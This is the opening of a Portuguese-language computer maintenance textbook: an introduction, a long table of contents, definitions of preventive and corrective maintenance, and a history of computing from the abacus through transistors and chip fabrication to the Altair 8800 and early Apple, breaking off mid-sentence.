Você está na página 1de 454

Durante o estudo, Apresentamos mais sobre a parte física do compu-

tador, ou seja, sobre HARDWARE da máquina, e também a parte


lógica, o SOFTWARE.

Podemos classificar o computador, conforme o que foi dito anterior-


mente, onde o hardware é a parte física do computador e software é
a parte lógica. Uma não tem finalidade sem a outra, é necessária a
total integração entre hardware e software.

Manutenção não é somente o “troca troca” de peças, é necessário um


bom conhecimento de hardware e software, para não causar um dano
maior ao equipamento.

Portanto...
Bom estudo.

1
Tópico Pg.
O que é “Manutenção de computadores”? ..................... 8
Manutenção preventiva .................................................. 8
Manutenção corretiva ..................................................... 8
Plataforma Windows ....................................................... 9
A Evolução dos Computadores ...................................... 9
O Ábaco .......................................................................... 10
A Programação ............................................................... 11
Como são fabricados os processadores ... .................... 18
Os transístores ....................................... ....................... 19
O surgimento dos computadores pessoais .................... 24
A década de 80 ............................................................... 28
O Lançamento do Spectrum ........................................... 34
A Ascensão do Spectrum ............................................... 34
O Declínio do Spectrum .................................................. 35
A Queda do Spectrum .................................................... 36
Os supercomputadores .................................................. 36
A demanda ..................................................................... 36
As soluções .................................................................... 37
Modelos .......................................................................... 38
A história ......................................................................... 40
Como tudo funciona ........................................................ 41
Como funciona o sistema binário? ................................. 42
Arquiteturas .................................................................... 49
Os Componentes ............................................................ 51
Desktops, Notebooks, Handhelds e Palmtops ............... 55
Escolhendo a melhor configuração ................................ 60
Escolhendo a placa mãe ................................................ 60
Escolhendo os outros periféricos ................................... 62
Memória RAM ................................................................ 62
Processador ................................................................... 63
Disco Rígido ................................................................... 64
Placa de Vídeo ............................................................... 65
Modem ............................................................................ 65
Placa de Som ................................................................. 65
Upgrades e atualizações ................................................ 66
O melhor custo beneficio ................................................ 68
Benchmarks, medindo sem erros ................................... 71
Linguagens de programação .......................................... 73

2
Colocando a mão na massa ........................................... 73
Assembly ........................................................................ 74
Fortran ............................................................................ 79
Pascal ............................................................................. 80
Cobol .............................................................................. 81
C ..................................................................................... 86
C++ ................................................................................. 87
Visual Basic .................................................................... 87
Delphi .............................................................................. 88
Barramentos internos e externos .................................... 89
O barramento do processador ........................................ 92
Velocidade do barramento do processador .................... 93
Exemplo de barramento: Pentium MMX e Socket 7 ....... 95
O MSX no Brasil ............................................................. 96
Invenções Nacionais ....................................................... 97
O barramento das memórias .......................................... 102
Velocidade do barramento das memórias ...................... 103
Os sinais de um barramento de memória ....................... 104
Barramento AGP ............................................................ 111
AGP e vídeo on-board .................................................... 112
As várias voltagens do AGP ........................................... 113
Versões do AGP ............................................................. 116
AGP 1x, 2x e 4x .............................................................. 116
AGP 8x ........................................................................... 118
Tabela de compatibilidade .............................................. 119
AGP Pro .......................................................................... 121
Módulo de memória AGP ............................................... 122
Mecanismo de retenção AGP ......................................... 122
Sinais do barramento AGP ............................................. 124
Modos DMA e Execute ................................................... 128
Barramento PCI .............................................................. 130
Tipos de PCI ................................................................... 131
Voltagens do PCI ............................................................ 134
Master e Target .............................................................. 136
Sinais do barramento PCI ............................................... 137
Transferências ................................................................ 138
Dispositivos de alta velocidade ....................................... 140
Bus Mastering ................................................................. 147
Plug and Play nos barramentos PCI e ISA ..................... 148

3
Conexões com outros barramentos ................................ 152
Uso de interrupções no barramento PCI ........................ 152
Barramento VLB ............................................................. 155
Barramento ISA .............................................................. 158
Sinais do barramento ISA ............................................... 160
LPC - substituto do ISA em placas modernas ................ 162
Barramentos AMR, CNR e ACR ..................................... 165
Velocidades dos principais barramentos ........................ 169
Processadores do 8086 ao Core .................................... 170
Características dos processadores modernos ............... 172
Coprocessador aritmético ............................................... 172
Memória Cache .............................................................. 174
Processadores RISC X Processadores CISC ................ 176
PCs x Macs .................................................................... 178
Front End e Back End .................................................... 180
Do 8086 ao Core ............................................................ 182
8088 ................................................................................ 182
Segmentação de Endereços .......................................... 184
286 .................................................................................. 185
386 .................................................................................. 187
A Introdução do Cache ................................................... 189
386SX ............................................................................. 189
Modo Real x Modo Protegido ......................................... 191
Recursos do Modo Protegido ......................................... 192
Memória Virtual ............................................................... 192
Multitarefa ....................................................................... 194
Memória Protegida ......................................................... 194
Modo Virtual 8086 ........................................................... 197
486 .................................................................................. 197
Multiplicação de Clock .................................................... 199
Pipeline ........................................................................... 200
Pentium ........................................................................... 202
Melhorias no Cache L1 ................................................... 203
Previsão de desvio dinâmico .......................................... 204
Coprocessador Aritmético mais rápido ........................... 204
Arquitetura Superescalar ................................................ 205
Execução Especulativa ................................................... 206
Acesso mais rápido à Memória ...................................... 207
Multiprocessamento ........................................................ 207

4
Clock e Overclock ........................................................... 208
Core i (3, 5 e 7) ............................................................... 210
Outros processadores .................................................... 213
486DLC e 486SLC .......................................................... 214
AMD 5x86 ....................................................................... 215
Cyrix Cx5x86 .................................................................. 216
AMD K5 .......................................................................... 217
Pentium Overdrive .......................................................... 218
Um tal de 186 ................................................................. 219
Winchester ou HD (Hard Disk) ....................................... 219
Sobre teclados ............................................................... 220
Pinagem em USB ........................................................... 227
Redes ............................................................................. 227
Tipos de redes ................................................................ 234
Topologia de redes ......................................................... 236
Periféricos de redes ........................................................ 237
Meios de transmissão ..................................................... 237
Protocolo TCP/IP ............................................................ 238
Máscara de rede ............................................................. 239
Crimpando (ou clipando) cabos de rede ......................... 239
Composição Física e Lógica .......................................... 252
Travamento ou Parqueamento ...................................... 255
Siglas para identificar discos rígidos e controladoras ... 256
Formatações .................................................................. 257
Sistemas Operacionais .................................................. 258
DOS ............................................................................... 258
Versões do MS-DOS ...................................................... 259
O Os/2 Warp ................................................................... 260
Versões do Windows ...................................................... 263
Linux ............................................................................... 279
Composição básica do PC ............................................. 282
Edição de comandos ...................................................... 284
Video ............................................................................... 285
Unidades de disco .......................................................... 286
Capacidade ..................................................................... 286
Arquivos em disco .......................................................... 286
Especificação de arquivos .............................................. 286
Nome de arquivos e referências genéricas .................... 287
Diretórios e sub diretórios (pastas) ................................. 288

5
Dispositivos padrão ........................................................ 289
Comandos do Sistema Operacional (DOS) .................... 290
Quanto à execução ......................................................... 290
Descrição dos comandos do DOS .................................. 290
Vírus ............................................................................... 301
Hardware não pensa ...................................................... 302
Vírus mutantes ............................................................... 302
Criadores de vírus .......................................................... 303
Mecanismo de ação ....................................................... 304
Como se proteger das ameaças..................................... 305
Por dentro do vírus ......................................................... 307
Algumas abreviaturas ..................................................... 311
Memórias ROM ou BIOS ................................................ 322
Memória RAM ................................................................. 322
Carga do SO .................................................................. 323
Setup ............................................................................ 323
Manutenção de driver ..................................................... 324
Manutenção das placas .................................................. 325
CPU – temperatura ambiente ......................................... 326
Hardware Interrupt (IRQ) ................................................ 326
Ventilação ....................................................................... 326
Erros de paridade de memória ....................................... 327
Fiação com mau contato ................................................ 328
Monitor de vídeo sem brilho ........................................... 328
Teclado falhando algumas teclas ................................... 328
Impressoras .................................................................... 329
Tabelas de conexões ...................................................... 331
Orientações especiais .................................................... 332
Ferramentas ................................................................... 333
Internet ........................................................................... 334
Defeitos apresentados por Software .............................. 337
Defeitos sinalizados por mensagens .............................. 341
Defeitos Sinalizados por Beeps ...................................... 342
Conselhos aos usuários ................................................. 343
Outros conselhos ........................................................... 344
Resumo dos Principais Fatos até 1999 .......................... 345
Windows 10 tem sete edições; veja quais são elas ....... 346
32-bits ou 64-bits: qual a diferença na ............................ 348
USB ou Thunderbolt? Entenda a guerra das conexões.. 352

6
Codecs de vídeo: o que são, para que servem e ........... 354
Como resolver 9 problemas comuns em PCs ................ 360
Fibras ópticas não são todas iguais ............................... 370
7 dicas importantes para escolher um HD externo ........ 371
Sobre Hardware ............................................................. 378
Sobre Software ............................................................... 380
Bibliografia ...................................................................... 387
UNIDADE FEDERAL DO ESPIRITO SANTO ................ 388

7
O que é “Manutenção de computadores”?

A manutenção relacionada a computadores é a ação, ou conjunto de


ações, desencadeada visando solucionar um problema diagnostica-
do, ou antever o problema por meio de análise de situações no funci-
onamento, relacionado a software e/ou hardware.

Manutenção preventiva

Chama-se manutenção preventiva a ação ocorrida com base na


análise prévia do computador, de seu funcionamento e execução,
relacionados à CPU e todos os periféricos, entendendo e aplicando-
se ações que visem evitar que determinados erros (de software e/ou
hardware) ocorram.

Existem softwares que são utilizados na manutenção preventiva. Vale


ressaltar que a manutenção preventiva é referência na utilização de
software relacionados à segurança (ferramentas de segurança
de servidores de rede, ferramentas e utilitários de sistema operacio-
nal, entre outros). Com relação à hardware de computador, a manu-
tenção preventiva é a limpeza dos componentes internos
do computador e da placa mãe, removendo poeira e qualquer tipo de
sujeira que possa afetar o funcionamento do hardware, ou ainda, a
configuração de serviços e funções disponibilizadas no BIOS para
evitar prováveis defeitos em componentes internos
do computador (como o superaquecimento do processador, por
exemplo).

Manutenção corretiva

Chama-se manutenção corretiva a ação ocorrida com base na falha


de execução (de hardware e/ou software) de computador, relacio-
nado à CPU e todos os periféricos, aplicando-se ações que visem
solucionar os erros encontrados.

Erros de hardware ocasionam falhas diversas de execução.

Existem diversos softwares relacionados à manutenção corretiva.


Vale ressaltar que a manutenção corretiva é referência na utilização

8
de softwares diversos (antivírus, ferramentas e utilitários de sistema
operacional, entre outros).

Plataforma Windows

Relacionado à manutenção preventiva e corretiva na Platafor-


ma Windows, podemos configurar utilitários deste sistema operacio-
nal (MSConfig e RegEdit), otimizando o funcionamento do referido
sistema.

A Evolução dos Computadores

Hoje em dia, quando ouvimos falar em processadores de 1 GHz dá


até sono, de tão comuns que eles já se tornaram. Pouca gente já
ouviu falar no 8088, que foi o processador usado no PC XT, a mais
de 20 anos atrás, e muito menos no Intel 4004, o primeiro micropro-
cessador, lançado em 1971.

Apesar dos computadores eletrônicos terem efetivamente aparecido


somente na década de 40, os fundamentos em que se baseiam re-
montam a centenas ou até mesmo milhares de anos.

Se levarmos em conta que o termo COMPUTAR significa fazer cálcu-


los, contar, efetuar operações aritméticas, COMPUTADOR seria en-
tão o mecanismo ou máquina que auxilia essa tarefa, com vantagens
no tempo gasto e na precisão. Inicialmente o homem utilizou seus
próprios dedos para essa tarefa, dando origem ao sistema DECIMAL
e aos termos DIGITAL e DIGITO. Para auxílio deste método, eram
usados gravetos, contas ou marcas na parede.

A partir do momento que o homem pré-histórico trocou seus hábitos


nômades por aldeias e tribos fixas, desenvolvendo a lavoura, tornou-
se necessário um método para a contagem do tempo, delimitando as
épocas de plantio e colheita.

Tábuas de argila foram desenterradas por arqueólogos no Oriente


Médio, próximo à Babilônia, contendo tabuadas de multiplicação e
recíprocos. Acredita-se que tenham sido escritas por volta de 1700

9
a.C. e usavam o sistema sexagesimal (base 60), dando origem às
nossas atuais unidades de tempo.

O Ábaco

Na medida em que os cálculos foram se complicando e aumentando


de tamanho, sentiu-se a necessidade de um instrumento que viesse
em auxílio, surgindo assim há cerca de 2.500 anos o ÁBACO. Este
era formado por fios paralelos e contas ou arruelas deslizantes que,
de acordo com a sua posição, representava a quantidade a ser traba-
lhada.

O ábaco russo era o mais simples: continha 10 contas, bastando con-


tá-las para obtermos suas quantidades numéricas. O ábaco chinês
possuía 2 conjuntos por fio, contendo 5 contas no conjunto das uni-
dades e 2 contas que representavam 5 unidades. A variante do ábaco
mais conhecida é o SOROBAN, ábaco japonês simplificado (com 5
contas por fio, agrupadas 4x1), ainda hoje utilizado, sendo que em
uso por mãos treinadas continuam eficientes e rápidos para trabalhos
mais simples.

Esse sistema de contas e fios recebeu o nome de CALCULI pelos


romanos, dando origem à palavra CÁLCULO.

No final do século XIX surgiu o relê, um dispositivo eletromecânico,


formado por um magneto móvel, que se deslocava unindo dois conta-
tos metálicos. O Relê foi muito usado no sistema telefônico, aliás
algumas centrais analógicas ainda utilizam estes dispositivos até
hoje. Os relês podem ser considerados uma espécie de antepassa-
dos dos transístores. Suas limitações eram o fato de serem relativa-
mente caros, grandes demais e ao mesmo tempo muito lentos: um
relê demora mais de um milésimo de segundo para fechar um circui-
to.

Em 1633, um sacerdote inglês chamado William Oughtred, teve a


ideia de representar esses logaritmos de Napier em escalas de ma-
deira, marfim ou outro material, chamando-o de CÍRCULOS DE
PROPORÇÃO. Este dispositivo originou a conhecida RÉGUA DE
CÁLCULOS. Como os logaritmos são representados por traços na

10
régua e sua divisão e produto são obtidos pela adição e subtração de
comprimentos, considera-se como o primeiro computador analógico
da história.

Régua de Cálculos - O primeiro computador analógico

A Programação

A maior evolução seguinte foi o contador mecânico, criado pelo ma-


temático Blaise Pascal, que utilizou engrenagens para somas e multi-
plicações. Essas máquinas se chamavam Pascalinas. As calculado-
ras da geração da Pascalina executavam somente operações se-
quenciais, completamente independentes.

A cada cálculo o operador deve intervir, introduzindo novos dados e o


comando para determinar qual operação deve ser efetuada. Essas

11
máquinas não tinham capacidade para tomar decisões baseadas nos
resultados.

Em 1801, Joseph Marie Jacquard, mecânico francês, sugeriu contro-


lar teares por meio de cartões perfurados. Os cartões forneceriam os
comandos necessários para a tecelagem de padrões complicados em
tecidos.

Os princípios de programação por cartões perfurados foram demons-


trados por Bouchon, Falcon e Jaques entre 1725 e 1745.

Em 1786, o engenheiro J. Muller, planejou a construção de uma má-


quina para calcular e preparar tabelas matemáticas de algumas fun-
ções. A máquina Diferencial, como foi chamada, introduzia o conceito
de registros somadores.

Também no final do século XIX, surgiram as primeiras válvulas. As


válvulas foram usadas para criar os primeiros computadores eletrôni-
cos, na década de 40.

As válvulas tem seu funcionamento baseado no fluxo de elétrons no


vácuo. Tudo começou numa certa tarde quando Thomas Edison,
inventor da lâmpada elétrica estava brincando com a sua invenção.
Ele percebeu que ao ligar a lâmpada ao polo positivo de uma bateria
e uma placa metálica ao polo negativo, era possível medir uma certa

12
corrente fluindo do filamento da lâmpada à chapa metálica, mesmo
que os dois estivessem isolados. Havia sido descoberto o efeito ter-
moiônico, o princípio de funcionamento das válvulas.

As válvulas já eram bem mais rápidas que os relês, atingiam frequên-


cias de alguns Megahertz, o problema é que esquentavam demais,
consumiam muita eletricidade e se queimavam com facilidade. Era
fácil usar válvulas em rádios, que usavam poucas, mas construir um
computador, que usava milhares delas era extremamente complica-
do, e caro.

Apesar de tudo isso, os primeiros computadores começaram a surgir


durante a década de 40, naturalmente com propósitos militares. Os
principais usos eram a codificação e decodificação de mensagens e
cálculos de artilharia. Sem dúvida, o computador mais famoso daque-
la época foi o ENIAC (Electronic Numerical Integrator Analyzer and
Computer), construído em 1946. O ENIAC era composto por nada
menos do que 17,468 válvulas, ocupando um galpão imenso. Porém,
apesar do tamanho, o poder de processamento do ENIAC é ridículo
para os padrões atuais, suficiente para processar apenas 5.000 adi-
ções, 357 multiplicações e 38 divisões por segundo, bem menos até
do que uma calculadora de bolso atual, das mais simples.

Parte do galpão que abrigava o ENIAC

13
Em 1890, o norte americano Hermann Hollerith (1860-1929) desen-
volve o primeiro computador mecânico. A partir de 1930, começam as
pesquisas para substituir as partes mecânicas por elétricas. O Mark I,
concluído em 1944 por uma equipe liderada por Howard Aiken, é o
primeiro computador eletromecânico capaz de efetuar cálculos mais
complexos sem a interferência humana. Ele mede 15 m x 2,5 m e
demora 11 segundos para executar um cálculo. Em 1946, surge o
Eniac (Electronic Numerical Integrator and Computer), primeiro com-
putador eletrônico e digital automático: pesa 30 toneladas, emprega
cerca de 18 mil válvulas e realiza 4.500 cálculos por segundo. O Eni-
ac contém a arquitetura básica de um computador, empregada até
hoje: memória principal (área de trabalho), memória auxiliar (onde
são armazenados os dados), unidade central de processamento (o
"cérebro" da máquina, que executa todas as informações) e dispositi-
vos de entrada e saída de dados que atualmente permitem a ligação
de periféricos como monitor, teclado, mouse, scanner, tela, impresso-
ra, entre outros. A invenção do transistor, em 1947, substitui progres-
sivamente as válvulas, aumentando a velocidade das máquinas.

A ideia era construir um computador para realizar vários tipos de cál-


culos de artilharia para ajudar as tropas aliadas durante a segunda
Guerra mundial. Porém, o ENIAC acabou sendo terminado exatos 3
meses depois do final da Guerra e acabou sendo usado durante a
guerra fria, contribuindo por exemplo no projeto da bomba de Hidro-
gênio.

Se você acha que programar em C ou em Assembly é complicado,


imagine como era a vida dos programadores daquela época. A pro-
gramação do ENIAC era feita através de 6.000 chaves manuais. A
cada novo cálculo, era preciso reprogramar várias destas chaves.
Isso sem falar no resultado, que era dado de forma binária através de
um conjunto de luzes. Não é à toa que a maior parte dos programa-
dores da época eram mulheres, só mesmo elas para ter a paciência
necessária para programar e reprogramar esse emaranhado de cha-
ves várias vezes ao dia.

Abaixo está a foto de válvulas muito usadas na década de 40:

14
Vendo essa foto é fácil imaginar por que as válvulas eram tão pro-
blemáticas e caras, elas eram simplesmente complexas demais.
Mesmo assim, na época a maior parte da indústria continuou traba-
lhando no aperfeiçoamento das válvulas, obtendo modelos menores e
mais confiáveis. Porém, vários pesquisadores, começaram a procurar
alternativas menos problemáticas.

Várias destas pesquisas tinha como objetivo a pesquisa de novos


materiais, tanto condutores, quanto isolantes. Os pesquisadores co-
meçaram então a descobrir que alguns materiais não se enquadra-
vam nem em um grupo nem no outro, pois de acordo com a circuns-
tância, podiam atuar tanto quando isolantes quanto como condutores,
formando uma espécie de grupo intermediário que foi logo apelidado
de grupo dos semicondutores.

Haviam encontrado a chave para desenvolver o transístor. O primeiro


projeto surgiu em 16 de Dezembro de 1947, onde era usado um pe-
queno bloco de germânio (que na época era junto com o silício o se-
micondutor mais pesquisado) e três filamentos de ouro. Um filamento
era o polo positivo, o outro o polo negativo, enquanto o terceiro tinha
a função de controle. Tendo apenas uma carga elétrica no polo posi-
tivo, nada acontecia, o germânio atuava como um isolante, bloquean-
do a corrente. Porém, quando uma certa tensão elétrica era aplicada
usando o filamento de controle, uma fenômeno acontecia e a carga
elétrica passava a fluir para o polo negativo.

15
Haviam criado um dispositivo que substituía a válvula, sem possuir
partes móveis, gastando uma fração da eletricidade gasta por uma e,
ao mesmo tempo, muito mais rápido.

O primeiro projeto de transístor

Este primeiro transístor era relativamente grande, mas não demorou


muito para que este modelo inicial fosse aperfeiçoado. Durante a
década de 50, o transístor foi gradualmente dominando a indústria,
substituindo rapidamente as problemáticas válvulas. Os modelos
foram diminuindo de tamanho, caindo de preço e tornando-se mais
rápidos. Alguns transístores da época podiam operar a até 100 MHz.
Claro que esta era a frequência que podia ser alcançada por um tran-
sístor sozinho, nos computadores da época, a frequência de opera-
ção era muito menor, já que em cada ciclo de processamento o sinal
precisa passar por vários transístores.

Mas, o grande salto foi a substituição do germânio pelo silício. Isto


permitiu miniaturizar ainda mais os transístores e baixar seu custo de
produção. Os primeiros transístores de junção comerciais foram pro-
duzidos partir de 1960 pela Crystalonics.

A ideia do uso do silício para construir transístores é que adicionando


certas substâncias em pequenas quantidades é possível alterar as
propriedades elétricas do silício. As primeiras experiências usavam
fósforo e boro, que transformavam o silício em condutor por cargas

16
negativas ou condutor por cargas positivas, dependendo de qual dos
dois materiais fosse usado.

Estas substâncias adicionadas ao silício são chamadas de impure-


zas, e o silício “contaminado” por elas é chamado de silício dopado.

O funcionamento e um transístor é bastante simples, quase elemen-


tar. É como naquele velho ditado “as melhores invenções são as mais
simples”. As válvulas eram muito mais complexas que os transístores
e mesmo assim foram rapidamente substituídas por eles.

Um transístor é composto basicamente de três filamentos, chamados


de base, emissor e coletor. O emissor é o polo positivo, o coletor o
polo negativo, enquanto a base é quem controla o estado do transís-
tor, que como vimos, pode estar ligado ou desligado. Veja como estes
três componentes são agrupados num transístor moderno:

Quando o transístor está desligado, não existe carga elétrica na base,


por isso, não existe corrente elétrica entre o emissor e o coletor.
Quanto é aplicada uma certa tensão na base, o circuito é fechado e é
estabelecida a corrente entre o emissor e o receptor.

Outro grande salto veio quando os fabricantes deram-se conta que


era possível construir vários transístores sobre o mesmo waffer de
silício. Havia surgido então o circuito integrado, vários transístores
dentro do mesmo encapsulamento. Não demorou muito para surgi-
rem os primeiros microchips.

17
Como são fabricados os processadores

Até mudarem o mundo como o conhecemos, os chips passaram por


um longo processo evolutivo.

Tudo começou com as válvulas, que evoluíram para os transístores,


considerados a maior invenção do século. Fora o preço, os primeiros
transístores não foram lá nenhuma revolução sobre as antigas válvu-
las, tanto que elas sobreviveram durante vários anos depois que os
transístores começaram a ser produzidos em escala comercial. O
grande salto veio quando descobriu-se que era possível construir
vários transístores sobre o mesmo waffer de silício. Isso permitiu di-
minuir de forma gritante o custo e tamanho dos computadores. En-
tramos então na era do microchip.

O primeiro microchip comercial foi lançado pela Intel em 1971 e cha-


mava-se 4004. Como o nome sugere, ele era um processador de
apenas 4 bits que era composto por pouco mais de 2000 transístores.

Veja uma foto dele abaixo:

Cortesia da Intel Corp.

De lá pra cá, foi um longo caminho. Enormes investimentos foram


feitos e muitos dos maiores gênios do planeta trabalharam em busca
de soluções para questões cada vez mais complexas.

18
Veremos agora como os computadores evoluíram, das válvulas aos
processadores.

Os transístores

Cada transístor funciona como uma espécie de interruptor, que pode


estar ligado ou desligado, como uma torneira que pode estar aberta
ou fechada, ou mesmo como uma válvula. A diferença é que o tran-
sístor não tem partes móveis como uma torneira e é muito menor,
mais barato, mais durável e muito mais rápido que uma válvula.

A mudança de estado de um transístor é feita através de uma corren-


te elétrica. Esta mudança de estado por sua vez pode comandar a
mudança de estado de vários outros transístores ligados ao primeiro,
permitindo processar dados. Num transístor esta mudança de estado
pode ser feita bilhões de vezes por segundo, porém, a cada mudança
de estado é gerada uma certa quantidade de calor e é consumida
uma certa quantidade de eletricidade. É por isso que quanto mais
rápidos tornam-se os processadores, mais eles se aquecem e mais
energia consomem.

Um 386 por exemplo consumia pouco mais de 1 Watt de energia e


podia funcionar sem nenhum tipo de resfriamento. Um 486DX-4 100
consumia cerca de 5 Watts e precisava de um cooler simples, en-
quanto Athlon chega a consumir 80 Watts de energia e precisa de no
mínimo um bom cooler para funcionar bem. Em compensação o 386
operava a 30 ou 40 MHz enquanto o Athlon opera a até 1.5 GHz.

Chegamos à ideia central deste capitulo que é mostrar como os pro-


cessadores são fabricados.

O componente básico para qualquer chip é o waffer de silício que é


obtido através da fusão do silício junto com alguns produtos químicos
que permitirão sua dopagem posteriormente.
Inicialmente são produzidos cilindros, com de 20 a 30 centímetros de
diâmetro, que posteriormente são cortados em fatias bastante finas.

19
Waffer de silício

Estas “fatias” por sua vez são polidas, obtendo os waffers de silício. A
qualidade do waffer determinará o tipo de chip que poderá ser cons-
truído com base nele. Para construir um CI com meia dúzia de tran-
sístores, pode ser usado um waffer de baixa qualidade, que pode ser
comprado a preço de banana de milhares de companhias diferentes.
Entretanto, para produzir um processador moderno, é preciso de um
waffer de altíssima qualidade, que são extremamente caros, pois
poucas companhias tem tecnologia para produzi-los.

Cada waffer é usado para produzir vários processadores, que no final


da produção são separados e encapsulados individualmente. Não
seria possível mostrar todos os processos usados na fabricação de
um processador, mas para lhe dar uma boa ideia de como eles são
produzidos, vou mostrar passo a passo a construção de um único
transístor. Imagine que o mesmo projeto será repetido alguns milhões
de vezes, formando um processador funcional.

Tudo começa com o waffer de silício em seu estado original:

A primeira etapa do processo é oxidar a parte superior do waffer,


transformando-a em dióxido de silício. Isto é obtido expondo o waffer
a gases corrosivos e altas temperaturas. A fina camada de dióxido de

20
silício que se forma é que será usada como base para a construção
do transístor.

Em seguida é aplicada uma camada bastante fina de um material foto


sensível sobre a camada de dióxido de silício.

Usando uma máscara especial, é jogada luz ultravioleta apenas em


algumas áreas da superfície.

Esta máscara tem uma padrão diferente para cada área do processa-
dor, de acordo com o desenho que se pretende obter. A técnica usa-
da aqui é chamada de litografia óptica.

A camada foto sensível é originalmente sólida, mas ao ser atingida


pela luz ultravioleta transforma-se numa substância gelatinosa, que
pode ser facilmente removida.

Depois de remover as partes moles da camada foto sensível, temos


algumas áreas do dióxido de silício expostas, e outras que continuam
cobertas pelo que restou da camada.

O waffer é banhado com um produto especial que remove as partes


do dióxido de silício que não estão protegidas pela camada foto sen-
sível. O restante continua intacto.

Finalmente, é removida a parte que restou da camada foto sensível.


Note que como temos substâncias diferentes é possível remover uma
camada de cada vez, ora o dióxido de silício, ora a própria camada
foto sensível. Com isto é possível “desenhar” as estruturas necessá-
rias para formar os transístores. Temos aqui pronta a primeira cama-
da. Cada transístor é formado para várias camadas, dependendo do
projeto do processador. Neste exemplo, temos um transístor simples,
de apenas quatro camadas, mas os processadores atuais utilizam um
número muito maior de camadas, mais de vinte em alguns casos,
dependendo da densidade que o fabricante pretende alcançar.

Começa então a construção da segunda camada do transístor. Inici-


almente o waffer passa novamente pelo processo de oxidação inicial,
sendo coberto por uma nova camada (desta vez bem mais fina) de

21
dióxido de silício. Note que apesar da nova camada de dióxido, o
desenho conseguido anteriormente é mantido.

Em seguida é aplicada sobre a estrutura uma camada de cristal de


silício. Sobre esta é aplicada uma nova camada de material foto sen-
sível.

Novamente, o waffer passa pelo processo de litografia, desta vez


utilizando uma máscara diferente.

Novamente, a parte da camada foto sensível que foi exposta à luz é


removida, deixando expostas partes das camadas de cristal de silício
e dióxido de silício, que são removidas em seguida.

Como na etapa anterior, o que restou da camada foto sensível é re-


movida. Terminamos a construção da segunda camada do transístor.

Chegamos a uma das principais etapas do processo de fabricação,


que é a aplicação das impurezas, que transformarão partes do waffer
de silício num material condutor. Estas impurezas também são cha-
madas de íons. Note que os íons aderem apenas à camada de silício
que foi exposta no processo anterior e não nas camadas de dióxido
de silício ou na camada de cristal de silício.

É adicionada então uma terceira camada, composta de um tipo dife-


rente de cristal de silício e novamente é aplicada a camada foto sen-
sível sobre tudo.

O waffer passa novamente pelo processo de litografia, usando mais


uma vez uma máscara diferente.

As partes do material foto sensível expostas à luz são removidas,


expondo partes das camadas inferiores, que são removidas em se-
guida.

Temos agora pronta a terceira camada do transístor. Veja que a es-


trutura do transístor já está quase pronta, faltando apenas os três
filamentos condutores.

22
Uma finíssima camada de metal é aplicada sobre a estrutura anterior.
Nos processadores atuais, que são produzidos através de uma técni-
ca de produção de 0.13 mícron, esta camada metálica tem o equiva-
lente a apenas 6 átomos de espessura.

O processo de aplicação da camada foto sensível, de litografia e de


remoção das camadas é aplicado mais uma vez, com o objetivo de
remover as partes indesejadas da camada de metal. Finalmente te-
mos o transístor pronto.

Cada processador é constituído por vários milhões de transístores.


Um Pentium II possui pouco mais de 9 milhões de transístores. Um
Pentium III Coppermine já possui 22 milhões. Um Athlon Thunderbird
possui 35 milhões de transístores, enquanto um Pentium 4 possui
incríveis 42 milhões. Graças ao nível de miniaturização que temos
atualmente, estas quantidades fabulosas de transístores ocupam uma
área muito pequena. Um Athlon Thunderbird por exemplo mede ape-
nas 112 milímetros quadrados. Com isto, um único waffer de silício é
suficiente para produzir vários processadores, que são separados no
final do processo de fabricação.

Finalmente, os processadores são encapsulados numa estrutura de


silício, que os protege e facilita o manuseio e instalação. O formato do
encapsulamento varia de processador para processador, na foto
abaixo temos um Athlon Thunderbird. Note que a parte central é a
própria parte inferior do waffer de silício, exposta para melhorar a
dissipação de calor. Não é preciso dizer que qualquer dano neste
parte será suficiente para inutilizar o processador.

23
O surgimento dos computadores pessoais

Até aqui, vimos sobre os supercomputadores e sobre a evolução dos


processadores, que evoluíram das válvulas para o transístor e depois
para o circuito integrado. No restante deste capítulo, veremos sobre
os primeiros computadores pessoais, que começaram a fazer sua
história a partir da década de 70.

O primeiro microchip, o 4004, foi lançado pela Intel em 1971. Era um


projeto bastante rudimentar, que processava apenas 4 bits por vez e
operava a apenas 1 MHz. Na verdade, o 4004 era tão lento que de-
morava 10 ciclos para processar cada instrução, ou seja, ele proces-
sava apenas 100.000 instruções por segundo. Hoje em dia esses
números perecem piada, mas na época era a última palavra em tec-
nologia. O 4004 foi usado em vários modelos de calculadoras.

Intel 4004

Pouco tempo depois, a Intel lançou um novo processador, que fez


sucesso durante muitos anos, o 8080. Este já era um processador de

24
8 bits, e operava a incríveis 2 MHz: “Ele é capaz de endereçar até 64
KB de memória e é rápido, muito rápido!” como dito num anúncio
publicitário do Altair 8800, que é considerado por muitos o primeiro
computador pessoal da história.

O Altair era baseado no 8080 da Intel e vinha com apenas 256 bytes
de memória, realmente bem pouco. Estava disponível também uma
placa de expansão para 4 KB.

No modelo básico, o Altair custava apenas 439 dólares na forma de


Kit, isso em 1975, em valores de hoje isso equivale a quase 4.000
dólares, parece bastante, mas na época esse valor foi considerado
uma pechincha, tanto que foram vendidas 4.000 unidades em 3 me-
ses, depois de uma matéria da revista Popular Eletronics. Esse “mo-
delo básico” consistia nas placas, luzes, chips, gabinete, chaves e a
fonte de alimentação, junto claro com um manual que ensinava como
montar o aparelho. Existia a opção de compra-lo já montado, mas
custava 182 dólares a mais.

Pouco tempo depois, começaram a surgir vários acessórios para o


Altair: um teclado que substituía o conjunto de chaves que serviam
para programar o aparelho, um terminal de vídeo (bem melhor que
ver os resultados na forma de luzes), um drive de disquetes (naquela
época ainda se usavam disquetes de 8 polegadas), placas de expan-
são de memória e até uma impressora, para quem tivesse muito di-
nheiro, claro. Até mesmo Bill Gates ajudou, desenvolvendo uma ver-
são do Basic para o Altair, imortalizado na foto abaixo:

Altair 8800

25
O Altair era realmente um sistema muito simples, que não tinha muita
aplicação prática, mas serviu para demonstrar a grande paixão que a
informática podia exercer e que, ao contrário do que diziam muitos
analistas da época, existia sim um grande mercado para computado-
res pessoais.

A Apple foi fundada em 1976, depois que o projeto do Apple I foi re-
cusado pela Atari e pela HP.

Uma frase de Steve Jobs descreve bem a história: “Então fomos à


Atari e dissemos Ei, nós desenvolvemos essa coisa incrível, pode ser
construído com alguns dos seus componentes, o que acham de nos
financiar? Podemos até mesmo dar a vocês, nós só queremos ter a
oportunidade de desenvolvê-lo, paguem-nos um salário e podemos
trabalhar para vocês”. Eles disseram não, fomos então à Hewlett-
Packard e eles disseram “Nós não precisamos de vocês, vocês ainda
nem terminaram a faculdade”.

O Apple I não foi lá um grande sucesso de vendas, vendeu pouco


mais de 200 unidades, mas abriu caminho para o lançamento de ver-
